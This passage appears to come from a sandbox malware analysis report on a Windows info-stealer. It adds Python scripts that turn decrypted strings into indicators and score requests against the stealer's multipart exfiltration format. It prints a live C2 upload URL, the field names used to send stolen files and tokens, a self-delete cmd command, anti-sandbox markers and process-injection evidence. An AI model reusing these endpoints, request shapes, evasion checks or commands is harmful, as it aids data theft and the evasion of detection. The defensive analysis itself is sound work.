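The decrypted-string dump above is only useful once it is turned into IOCs: the C2 base and gate path are separate strings, the self-delete command is split around the path the stealer fills in at run time, and the multipart field names and sandbox markers are scattered through the list. The script below is an added example, not code from the sample or from the sandbox: it parses lines in this report's own `String decryptor:` layout and groups them. The grouping rules (16-hex-digit gate paths, the marker set `VMwareVMware`/`HAL9TH`/`JohnDoe` as environment fingerprints, the two `timeout`/`del` fragments belonging to one command) are this example's assumptions about the strings' roles, drawn only from the values shown on this page.

```python
"""Added example (not the sample's or the sandbox's code): turn the
"String decryptor" report lines into checkable IOCs."""
import re
from urllib.parse import urljoin

MARKER = "String decryptor: "

# Constructed input: a subset of this report's lines, copied in the report's layout.
REPORT_LINES = r"""
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: POST
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: hwid
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: build
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: token
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: file_name
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: file
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: message
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VMwareVMware
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HAL9TH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: JohnDoe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: http://193.143.1.226
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /129edec4272dc2c8.php
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /cdb52cf952e86d4b/
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: newpakistan
"""

# Names the strings show being used as multipart form-data field names.
FORM_FIELDS = ("hwid", "build", "token", "file_name", "file", "message")
# Values the stealer compares against environment data (assumption: the VMware
# vendor string, and the computer/user name of the Defender emulator).
SANDBOX_MARKERS = ("VMwareVMware", "HAL9TH", "JohnDoe")


def decrypted_strings(report_text):
    """Values after the marker, in report order; lines without it are skipped."""
    out = []
    for line in report_text.splitlines():
        i = line.find(MARKER)
        if i != -1:
            out.append(line[i + len(MARKER):])
    return out


def self_delete_command(values):
    """Join the two fragments around the path the stealer inserts at run time."""
    head = next((v for v in values if v.startswith("/c timeout")), None)
    tail = next((v for v in values if v.startswith('" & del')), None)
    if head is None or tail is None:
        return None
    return head + "<own path>" + tail


def triage(report_text):
    values = decrypted_strings(report_text)
    # One bare scheme://host string is the C2 base; gates are /<16 hex>.php or /<16 hex>/
    base = next((v for v in values if re.fullmatch(r"https?://[^/\s]+", v)), None)
    gates = [v for v in values if re.fullmatch(r"/[0-9a-f]{16}(?:\.php|/)", v)]
    return {
        "c2_base": base,
        "c2_urls": [urljoin(base, g) for g in gates] if base else [],
        "form_fields": [v for v in values if v in FORM_FIELDS],
        "sandbox_markers": [v for v in values if v in SANDBOX_MARKERS],
        "self_delete": self_delete_command(values),
        "spawns_cmd": any(v.lower().endswith("\\cmd.exe") for v in values),
    }


if __name__ == "__main__":
    for key, value in triage(REPORT_LINES).items():
        print(f"{key}: {value}")
```

Joining the base and the gate reproduces the URL the configuration extractor reports in the Networking section below, which is a quick consistency check between the string decryptor and the extractor.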

Networking

Source: Malware configuration extractor URLs: http://193.143.1.226/129edec4272dc2c8.php
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://.css
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://.jpg
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://earth.google.com/kml/2.0
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://earth.google.com/kml/2.1
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://earth.google.com/kml/2.2
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://html4/loose.dtd
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/gml
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/gml/3.2
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/gml/3.3/exr
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/kml/2.2
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://www.topografix.com/GPX/1/1
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://api.loganalytics.iohttps://api.loganalytics.ushttps://datalake.azure.net/https://graph.micro
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://auth.docker.com/
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://batch.cloudapi.de/https://gallery.azure.com/https://graph.cloudapi.de/https://graph.windows.
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://cosmos.azure.comhttps://vault.azure.net/iam.us-gov.amazonaws.comidna:
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://database.chinacloudapi.cn/https://gallery.usgovcloudapi.net/https://login.microsoftonline.co
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://github.com/uber-go/dig/issues/new
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://manage.windowsazure.com/publishsettings/indexillegal
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexinternal
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://onsi.github.io/gomega/#adjusting-output
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://onsi.github.io/gomega/#eventually
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://ossrdbms-aad.database.chinacloudapi.cningest.timestream-fips.us-east-1.amazonaws.comingest.t
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://vault.azure.cn/https://vault.azure.netimage/x-portable-anymapimage/x-portable-bitmapimage/x-
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://vault.azure.cniam-fips.amazonaws.comidna:
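
The decrypted strings describe the exfiltration channel well enough to write a network check: an HTTP `POST` with `Content-Type: multipart/form-data; boundary=----` followed by characters from `ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890`, parts named `hwid`, `build`, `token`, `file_name`, `file` and `message`, sent to a 16-hex-digit `.php` gate on the C2 listed above. The script below is an added example, not the sample's code or a capture from it: it builds constructed requests in that shape and scores them. The part order, the sample values (including the use of `newpakistan` as a build tag, which is an assumption about a string that merely sits next to the C2 URL) and the boundary characters are invented for the example; the real request layout is not on this page.

```python
"""Added example (not the sample's code): score HTTP requests against the
multipart exfiltration shape reconstructed from the decrypted strings."""
import re

BOUNDARY_RE = re.compile(r"boundary=(----[A-Z0-9]+)\s*$")   # "----" + [A-Z0-9] alphabet
GATE_RE = re.compile(rb"/[0-9a-f]{16}\.php")                  # e.g. /129edec4272dc2c8.php
FIELDS = {"hwid", "build", "token", "file_name", "file", "message"}


def build_request(path, boundary, fields):
    """Constructed client side: assemble a multipart/form-data POST."""
    body = b""
    for name, value in fields.items():
        body += b"--" + boundary.encode() + b"\r\n"
        body += b'Content-Disposition: form-data; name="' + name.encode() + b'"\r\n\r\n'
        body += value + b"\r\n"
    body += b"--" + boundary.encode() + b"--\r\n"
    head = (b"POST " + path.encode() + b" HTTP/1.1\r\n"
            b"Host: 193.143.1.226\r\n"
            b"Content-Type: multipart/form-data; boundary=" + boundary.encode() + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n")
    return head + b"\r\n" + body


def parse_multipart(body, boundary):
    """{field name: payload bytes} for each part; stops at the closing delimiter."""
    delim = b"--" + boundary.encode()
    parts = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" ends the body
            break
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        head, _, payload = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            # strip exactly the CRLF that precedes the next delimiter, not payload bytes
            parts[m.group(1).decode()] = payload[:-2] if payload.endswith(b"\r\n") else payload
    return parts


def score_request(raw):
    """Return (reasons, parsed fields); an empty reasons list means no match."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower().decode()] = v.strip().decode()
    reasons, fields = [], {}
    m = BOUNDARY_RE.search(headers.get("content-type", ""))
    if method != b"POST" or not m:
        return reasons, fields
    reasons.append("boundary '----' + [A-Z0-9] alphabet")
    if GATE_RE.fullmatch(path):
        reasons.append("16-hex .php gate path")
    fields = parse_multipart(body, m.group(1))
    hit = FIELDS & set(fields)
    if {"hwid", "build", "token"} <= hit:
        reasons.append("hwid/build/token check-in fields")
    if {"file_name", "file"} <= hit:
        reasons.append("file_name/file upload fields")
    return reasons, fields


# Constructed samples (values, order and boundary are invented for the example).
BOUNDARY = "----H3KM9PQ2XZ7B1LAW"
CHECKIN = build_request("/129edec4272dc2c8.php", BOUNDARY,
    {"hwid": b"CONSTRUCTED-HWID", "build": b"newpakistan", "token": b"CONSTRUCTED-TOKEN"})
UPLOAD = build_request("/129edec4272dc2c8.php", BOUNDARY,
    {"token": b"CONSTRUCTED-TOKEN", "file_name": b"screenshot.jpg", "file": b"\xff\xd8\xff\xe0JFIF-bytes"})
BENIGN = build_request("/upload", "----WebKitFormBoundary7MA4YWxkTrZu0gW", {"file": b"hello"})

if __name__ == "__main__":
    for name, req in (("check-in", CHECKIN), ("upload", UPLOAD), ("browser", BENIGN)):
        reasons, fields = score_request(req)
        print(name, "->", reasons or "no match", sorted(fields))
```

The browser request is there as the negative case: WebKit boundaries contain lower-case letters, so the alphabet check alone separates them, and the gate-path and field-name checks keep a single boundary coincidence from firing on its own. A boundary sent in double quotes would not match `BOUNDARY_RE`; the decrypted string shows it unquoted, which is what this check assumes.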

System Summary

Source: 00000000.00000002.1889291210.000000C000B3A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1889291210.000000C000AEE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1889291210.000000C000BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B961A0 0_2_000000C000B961A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F992 0_2_000000C000B9F992
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B978C0 0_2_000000C000B978C0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B91500 0_2_000000C000B91500
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F1DA 0_2_000000C000B9F1DA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F60E 0_2_000000C000B9F60E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9FBB9 0_2_000000C000B9FBB9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F33B 0_2_000000C000B9F33B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F731 0_2_000000C000B9F731
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B96710 0_2_000000C000B96710
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B86C7E 0_2_000000C000B86C7E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B90490 0_2_000000C000B90490
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F489 0_2_000000C000B9F489
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B97FE0 0_2_000000C000B97FE0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F992 0_2_000000C000D2F992
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D261A0 0_2_000000C000D261A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D21500 0_2_000000C000D21500
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D278C0 0_2_000000C000D278C0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F60E 0_2_000000C000D2F60E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F1DA 0_2_000000C000D2F1DA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2FBB9 0_2_000000C000D2FBB9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D26710 0_2_000000C000D26710
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F731 0_2_000000C000D2F731
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F33B 0_2_000000C000D2F33B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D20490 0_2_000000C000D20490
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F489 0_2_000000C000D2F489
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D16C7E 0_2_000000C000D16C7E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D27FE0 0_2_000000C000D27FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 030543B0 appears 316 times
Source: LisectAVT_2403002A_326.exe Static PE information: Number of sections : 12 > 10
Source: LisectAVT_2403002A_326.exe Binary or memory string: OriginalFilename vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000000.1705218440.00007FF6AC316000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAlkom Engineering-Setup.exeP0 vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe Binary or memory string: OriginalFilenameAlkom Engineering-Setup.exeP0 vs LisectAVT_2403002A_326.exe
Source: 00000000.00000002.1889291210.000000C000B3A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1889291210.000000C000AEE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1889291210.000000C000BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: LisectAVT_2403002A_326.exe Binary string: lande (la)NtSetSystemInformationNyiakeng_Puachue_HmongOccitan France (oc-FR)OleCreatePropertyFrameOromo Ethiopia (om-ET)Pakistan Standard TimeParaguay Standard TimePower PC little endianRegisterTypeLibForUserRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersRussian Russia (ru-RU)SafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSanskrit India (sa-IN)Sao Tome Standard TimeSesotho Sa Leboa (nso)SetupDiEnumDriverInfoWSetupDiGetClassDevsExWSomali Somalia (so-SO)Spanish Mexico (es-MX)Spanish Panama (es-PA)Svalbard and Jan MayenSwedish Sweden (sv-SE)SynchronizedAfterSuiteTARGET_TYPE_ENUM_ENTRYTLS_AES_128_GCM_SHA256TLS_AES_256_GCM_SHA384Tasmania Standard TimeTrailNotFoundExceptionTrainingCenterDatabaseTurkish Turkey (tr-TR)Unsupported Media TypeUnsupportedCertificateWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWrong unwind opcode %dX-Content-Type-OptionsXXX_InternalExtensionsYiddish World (yi-001)Yoruba Nigeria (yo-NG)[client-transport %p] [server-transport %p] "<internal error: %v>"\Device\NamedPipe\msys
Source: LisectAVT_2403002A_326.exe Binary string: \Device\NamedPipe\cygwin
Source: classification engine Classification label: mal100.troj.evad.winEXE@3/0@0/0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe File created: C:\Users\Public\Libraries\ooabk.scif
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe File opened: C:\Windows\system32\
Source: LisectAVT_2403002A_326.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LisectAVT_2403002A_326.exe String found in binary or memory: google.golang.org/grpc@v1.62.1/internal/balancerload/load.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: O//9BNg/dpMnZW25KydO4wtVxWAIbho= depgithub.com/docker/docker-credential-helpersv0.7.0h1:xtCHsjxogADNZcdv1pKUHXryefjlVRqWqIhk/uXJp0A= depgithub.com/docker/go-connectionsv0.5.0h1:USnMq7hx7gwdVZq1L49hLXaFtUdTADjXGp+uj1Br63c= depgithub.com/edsrzf/mmap-gov1
Source: LisectAVT_2403002A_326.exe String found in binary or memory: net/addrselect.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.7.0h1:xtCHsjxogADNZcdv1pKUHXryefjlVRqWqIhk/uXJp0A=
Source: LisectAVT_2403002A_326.exe String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: LisectAVT_2403002A_326.exe String found in binary or memory: net/addrselect.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: google.golang.org/grpc@v1.62.1/internal/balancerload/load.go
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe File read: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe
Source: unknown Process created: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe "C:\Users\user\Desktop\LisectAVT_2403002A_326.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: opengl32.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: glu32.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: LisectAVT_2403002A_326.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: LisectAVT_2403002A_326.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: LisectAVT_2403002A_326.exe Static file information: File size 23900169 > 1048576
Source: LisectAVT_2403002A_326.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x913e00
Source: LisectAVT_2403002A_326.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x162e00
Source: LisectAVT_2403002A_326.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc04c00
Source: LisectAVT_2403002A_326.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: LisectAVT_2403002A_326.exe, LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0306918C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0306918C
Source: LisectAVT_2403002A_326.exe Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000BA23BD push ecx; ret 0_2_000000C000BA23D0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000BA1F84 push ecx; ret 0_2_000000C000BA1F97
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B86C7E pushad ; retf 0_2_000000C000B883B9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D31F84 push ecx; ret 0_2_000000C000D31F97
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D323BD push ecx; ret 0_2_000000C000D323D0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D16C7E pushad ; retf 0_2_000000C000D183B9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000CE0AC5 push ecx; ret 0_2_000000C000CE0AD8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_030676C5 push ecx; ret 1_2_030676D8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API coverage: 7.4 %
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03051120 GetSystemInfo, 1_2_03051120
Source: BitLockerToGo.exe, 00000001.00000002.1872504187.00000000033C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware`
Source: BitLockerToGo.exe, 00000001.00000002.1872504187.00000000033C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1890618818.00000225D3112000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03067B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_03067B4E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0306918C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0306918C
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000CDF1C0 mov eax, dword ptr fs:[00000030h] 0_2_000000C000CDF1C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03065DC0 mov eax, dword ptr fs:[00000030h] 1_2_03065DC0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process token adjusted: Debug
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03067B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_03067B4E
